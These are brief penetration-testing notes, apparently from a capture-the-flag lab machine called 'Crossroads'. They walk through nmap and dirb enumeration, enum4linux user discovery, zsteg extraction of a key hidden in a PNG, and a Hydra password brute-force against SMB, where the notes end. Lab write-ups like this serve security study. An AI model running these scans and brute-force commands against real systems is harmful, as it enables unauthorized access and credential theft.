1. Enumeration: (Network Scan)

  nmap 10.10.20.0/24

  results: 10.10.20.53

  Open Ports:

      80/tcp open http
      139/tcp open netbios-ssn
      445/tcp open microsoft-ds

2.Enumerate 

    A. dirb http://10.10.20.53

          results:

                  a. index.html
                  b. robots.txt  
                            User-agent: *
                            Disallow: /crossroads.png
                  c. server-status

    B. enum4linux 10.10.20.53

          results: albert 

3. Enumerate PNG file

    A. zsteg crossroads.png
    
          results:

                  b2,b,msb,xy  ..  file: OpenPGP Secret Key

    B. exiftool (jpg or png)

4. Get password with Hydra

    A. hydra -l albert -P rockyou.txt smb://10.10.20.53

    

  
